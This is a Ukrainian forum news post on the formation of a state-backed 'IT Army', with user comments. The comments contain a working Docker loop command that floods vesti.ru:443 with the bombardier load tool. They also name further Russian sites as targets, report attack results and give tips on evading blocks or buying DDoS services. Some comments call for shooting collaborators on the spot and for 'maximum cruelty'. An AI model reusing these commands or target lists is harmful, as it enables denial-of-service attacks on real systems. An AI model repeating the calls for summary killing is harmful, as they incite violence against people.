Мінцифри створює IT-армію. Завдання знайдуться для всіх

Михайло Федоров створює IT-армію, щоб залучити фахівців з цифрової галузі до боротьби на кіберфронті.

Стати її частиною можуть не лише розробники й кіберспеціалісти. Знадобиться й допомога дизайнерів, копірайтерів, маркетологів, таргетологів та усіх інших.

Усі оперативні завдання викладатимуть в телеграм-каналі IT ARMY of Ukraine.

Перші завдання — спрямувати DDoS- і кібератаки на російські ресурси корпорацій, банків та державної інфраструктури.

Продовжуємо боротися 💪

👍ПодобаєтьсяСподобалось16
До обраногоВ обраному0
LinkedIn
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter

Підкажіть, як поєднати alpine/bombardier та openSUSE. Судячи з активності мережі, у мене він не працює. До того ж «docker container ls» в колонці PORTS нічого не показує.

Спільнота DOU, будь ласка поширите це повідомлення!!!!
Поширите в своїх робочих чатах, доведіть це до high-level менеджменту!!!

..Mayday....Mayday...WORLD......talking.. UKRAINE..

If you with your country have a big pain of WAR in Ukraine — YOU or YOUR ORGANISATION can help us with money DONATION to the official organisations such as:
.........

m.facebook.com/...​349935&id=100021742393894

Треба ддосити білоруські сайти теж, банки, ітд.

Коментар порушує правила спільноти і видалений модераторами.

Чи можливо сліпити ворожі супутники. Можливо дроном з світловим шумом робити
штучні світлові хмари шоб він не бачив міток. Післязавтра будє хмарно то супутники будуть сліпі.

Треба класти їхню «розетку» особливо якщо завтра курс піде вниз:
www.dns-shop.ru
Яндекс теж працює ще !!!

Уже яндекс положили, идем дальше по списку.

У нас є якийсь офіційний ресурс, краще окремих сайт на якого є референси з державних сайтів, або в новинах телекомпаній, — де перелічені найбільші волонтерські організації, як Повернись Живим?

Також перечень офіційних телеграм-чатів та фейсбук-сторінок, також з референтами на офіційні джерела?

Пропоную замутити такий ресурс з проплаченою рекламою в пошуковику, щоб за першим кліком в пошуковику можна було знайти в топі цей сайт!!!
Також референсити це в постах для лідогеннрації — щоб пошуковик сам видавав в топ

Наразі важко знайти в одному місці декілька офіційних каналів, з першоджерелом. Навіть на цій сторінці ви не вказали першоджерело, залишається тільки по довірі до DOU клікати на телеграм-канали

Вопрос, к примеру есть такие репортажи CNN — edition.cnn.com/...​kraine-military-conflict

Они свободно снимают технику оккупантов, можно ли куда-то это сливать, если мониторить на постоянной основе?

Нагадую, що в умовах війни — усіх колаборантів, зрадників, мародерів розстрілюють на місці.

Ворогів само собою. Максимальна жорстокість і лють в усіх проявах війни — фізичної, хакерської, військової тощо. Ми захищаємось, маємо повне право.

Маю приклад, в регіоні, де я зараз перебуваю жінка з рушниці застрелила мародера у себе дома. Скоріше за все їй нічого не буде.

А IT-армия может вырубать вражескую бронетехнику?

Интересует: Су, Илы, БТРы, Линкоры и т.д.
Таска имплементируема?

Ілон Маск за проханням Федорова надав доступ Україні до сервісів Starlink, термінали вже в дорозі
twitter.com/...​tatus/1497701484003213317

Ті мери та керівництво міст, смт, областей, які не передали всю повноту влади бойовим генералам, офіцерам армії та військовим — потенційно зрадники-колаборанти.

знаєте таких? батьківщина має знати своїх героїв

Зараз потрібно забезпечити потреби населення в необхідному. Пару днів і продуктів не буде у багатьох.
Частина людей просто не має запасу продуктів та коштів; хтось хворів, хтось має хронічну хворобу або ж хронічну психічну хворобу, хтось був безробітний, інвалідність, залишені дітьми які виїхали, тощо. Йти і просити у незнайомих тобі людей — це не кожен буде робити. Хтось має кошти, але не може донести ті продукти бо хворі ноги.

З однієї сторони, простіше і ефективніше робити без сайтів — наприклад підійти/подзвонити до коменданта будинку або розвісити обяви у дворі з проханням звертатись до коменданта або надати свій номер.

Але якщо є в мережі інформація про потреби хоча б з номером вулиці та номером будинку, то було б дуже непогано. Раніше — під час майдану був такий сайт, простенький, деякі люди звертались туди, не памятаю тільки адресу, може зараз є. Може якісь є спрямовані гуманітарні групи в телеграмі, тощо.

На жаль, комендантський час дещо обтяжує дану проблему. Поки що, хоча й дуже обмежено, можна використовувати наявні телефонні контакти або контактувати з тими в під’їзді хто вас знає, хто не виїхав.

Приклади повідомлень в мережі: www.facebook.com/...​.ua/posts/329732322518716

* «где в Киеве еду раздают? я без работы с мамой и крестной остались»

* «Як тепер евакуюватися з Києва?хвора літня жінка,хвора бабуся та маленька дитина в Києві без продуктів,підвалу в домі немає ,бомбосховище та метро далеко ?Допоможіть,будь ласка».

Зрозуміло, що ніяка горяча лінія працювати не буде, не витримає, потрібно з людьми працювати особисто, а не кидати кошти невідомо кому або диверсантам. Тут потрібна самоорганізація громад, кожного двора, тощо.

Є ще Червоний Хрест, місцева соцслужба, але є момент складності коммунікацій, коли багато людей потребують допомоги. Соцслужба ці дні моїх знайомих не обслуговувала (нібито тимчасово — не знаю). Червоний Хрест нібито потребує волонтерів, втім я глибоко не досліджував.

Про наявні працюючі волонтерські ініціативи — напишіть будь ласка.

где эвакуация — там и путь обратно, не судите строго, но паста выглядит как разведка

Прикольно. А Захід країни заполонили автівки з Києва, при чому 90% «успішні бізнесмени», скуповують продукти і т.п. А один унікум в місцевому супермаркеті купив два візка горілки, напевно знав що заборонять, тому затарився) хоча у нас самогон в рази кращий)

в Киеве кстати без этого шлака просто замечательно сейчас

Лайк, ретвіт. Комент під постом anonymous twitter.com/...​tatus/1497676983601442829

ребята, подскажи плиз как с убунты запустить скрипт с докера в цикл, чтоб я на ночь оставил машину бомбить это все, инет тянет 8 терминалов

юзаю alpine/bombardier -c 10000 -d 60s -l

-d 60s это delay, насколько я понимаю?

for i in {1..1000}; do sudo docker run -it alpine/bombardier -c 1000 -d 60s -l vesti.ru:443 && sleep 5; done

Коллеги, пожалуйста, указывайте хосты vesti.ru:443, чтобы забить бекэнд.

просто vesti.ru — это DDoS редиректа, что мало поможет.

Ну и по результатам:
1xx — 0, 2xx — 0, 3xx — 0, 4xx — 7988, 5xx — 0

4xx — ошибки или dial tcp 178.248.233.32:443: connect: connection timed out — 100
пора менять сервер, вас забанили

5xx ошибки — работаем дальше)

А як дізнатися який саме порт? 443 це що?

Та ти розумієш, в чому справа, якщо буде одна інструкція «як ддосити» і всі її будуть юзати, то і протидія проти неї буде одна і знайдеться швидко. Тому покреатив — подумай чи будеш з домашнього компа це робити, чи з клауда, чи з-під впн якогось. Інструмент обери. А може просто вкладеш пару доларів і замовиш на чорному ринку? Імпровізуй, і тоді розгрібти це їм буде важче.

P.S. Якщо ліньки морочитися — то ось хоч щось для початку: dou.ua/forums/topic/36700

Згоден із побратимами, починаємо із Ддосів, а далі побачимо. Дія не пріоритет і взагалі не викликає довіри

Потрібна автоматизація для клоудів з відкритим репозіторієм

Дуже актуально! Можно зробити приватні репо і запрошувати по запиту! Зекономить багато часу!!!

Ой не верю, что с их отношением к безопасности и кидаловом айтишников туда стоит ходить.
Уже куча волонтерских групп вокруг, которіе ДДоСят. А Федоров только потом себе славу Анонимуса присвоит. И на єтой славе будет вводить дію.

Коллеги, просто ддосимо.
Першим ділом, першим ділом ддос, а Дія — потім))

Дия подождёт, а русские нет.

Ну вопрос зачем ходить именно к Федорову, когда вокруг полно добробатов

Ну, наприклад тому, що він зібрав вже 62к людей в каналі ІТ-армії. А це для ддос важливо. Я Вам перший скажу, що Федоров — @#$%@, але він наш @#$%@.

да вон соседние топики с описанием досов.
вот еще какой-то слабо организованный uatechpower.slack.com

Скиньте хтось запрошення в організацію в слеку —

uatechpower.slack.com

Та я не знаю, як, і мене там вже забанили

Підписатись на коментарі